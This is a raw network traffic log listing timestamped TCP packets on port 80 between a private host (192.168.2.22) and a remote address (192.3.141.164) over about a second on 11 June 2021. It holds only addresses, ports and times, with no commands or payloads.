Jun 11, 2021 15:59:27.836082935 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836122036 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836127043 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.836170912 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.836177111 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836209059 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.836215019 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836247921 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.836252928 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836286068 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.836289883 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836323023 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.836328983 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836361885 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.836371899 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836385965 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836401939 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.836402893 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.836461067 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.839699030 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977008104 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977046013 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977072001 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977097034 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977118969 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977140903 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977163076 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977188110 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977199078 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977210045 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977226019 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977229118 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977232933 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977243900 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977260113 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977260113 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977283001 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977297068 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977305889 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977319956 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977327108 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977338076 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977349043 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977361917 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977370977 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977380991 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977391958 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977402925 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977413893 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977426052 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977440119 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977447033 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977463007 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977472067 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977484941 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977505922 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977508068 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977514029 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977526903 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977539062 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977546930 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977560043 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977569103 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977581024 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977590084 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977601051 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977615118 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977622986 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977638006 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977647066 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977658033 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977669001 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977678061 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977689981 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977699041 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977709055 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977719069 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977730036 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977740049 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977750063 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977761030 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977771997 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977786064 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977793932 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977807999 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977817059 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977828979 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977838993 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977849960 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977859020 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977870941 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977885008 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977891922 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977909088 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977912903 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977921009 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977933884 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977943897 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977958918 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977963924 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.977981091 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.977989912 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.978003025 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.978014946 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.978023052 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.978044033 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.978058100 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.978827000 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.980123043 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.980145931 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:27.980226994 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:27.988198042 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.119319916 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.119355917 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.119370937 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.119584084 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.119741917 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.119760990 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.119779110 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.119803905 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.119838953 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.119945049 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.119996071 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120090961 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120143890 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120186090 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120203018 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120220900 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120233059 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120238066 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120255947 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120265961 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120271921 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120287895 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120297909 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120305061 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120326996 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120327950 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120343924 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120357037 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120358944 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120376110 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120388985 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120395899 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120413065 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120424032 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120433092 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120449066 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120450974 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120470047 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120479107 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120487928 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120505095 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120510101 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120522022 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120534897 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120538950 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120556116 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120565891 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120573044 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120590925 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120599031 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120610952 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120625973 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120629072 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120646954 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120656013 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120663881 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120680094 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120687962 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120695114 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120711088 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120717049 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120727062 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120747089 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120747089 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120764017 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120779991 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120783091 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120795965 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120812893 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120822906 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120827913 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.120831013 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.120863914 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.122469902 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.129532099 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.129554987 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.129704952 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.259730101 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.259804964 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.259850979 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.260006905 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.260179043 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.260220051 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.260235071 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.260258913 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.260324001 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.260493994 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.260540009 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.260559082 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262460947 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262502909 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262542009 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262573957 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262583971 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262598991 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262622118 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262639999 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262661934 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262682915 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262701035 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262712955 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262743950 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262749910 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262793064 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262810946 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262831926 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262844086 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262872934 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262882948 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262912035 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262921095 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262949944 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.262970924 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.262989998 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263001919 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263029099 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263047934 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263077021 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263082027 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263153076 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263190031 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263194084 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263231039 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263254881 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263287067 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263299942 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263328075 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263358116 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263364077 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263375044 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263392925 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263430119 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263443947 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263468981 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263482094 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263515949 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263516903 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263560057 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263571024 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263598919 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263606071 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263639927 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263653040 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263679028 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263689995 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263716936 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263720989 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263756990 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263770103 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263796091 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263806105 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263835907 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263843060 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263885975 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263896942 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263922930 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263933897 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.263962984 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.263977051 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.264003992 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.264010906 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.264041901 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.264041901 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.264081001 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.264096022 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.264130116 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.265620947 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.269629002 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.269670963 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.269721031 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.269732952 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.271727085 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400151968 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400209904 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400238991 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400245905 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400271893 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400290966 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400293112 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400335073 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400343895 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400373936 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400383949 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400415897 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400417089 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400458097 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400468111 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400507927 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400640011 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400680065 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400697947 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400718927 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400731087 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400765896 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400767088 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400810003 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400816917 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400847912 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.400861025 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.400897980 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404103041 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404159069 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404175043 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404198885 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404212952 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404241085 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404254913 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404280901 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404294014 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404320002 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404326916 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404357910 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404366970 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404397011 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404403925 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404444933 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404445887 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404489994 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404498100 CEST	49174	80	192.168.2.22	192.3.141.164
Jun 11, 2021 15:59:28.404527903 CEST	80	49174	192.3.141.164	192.168.2.22
Jun 11, 2021 15:59:28.404551983 CEST	49174	80	192.168.2.22	192.3.141.164
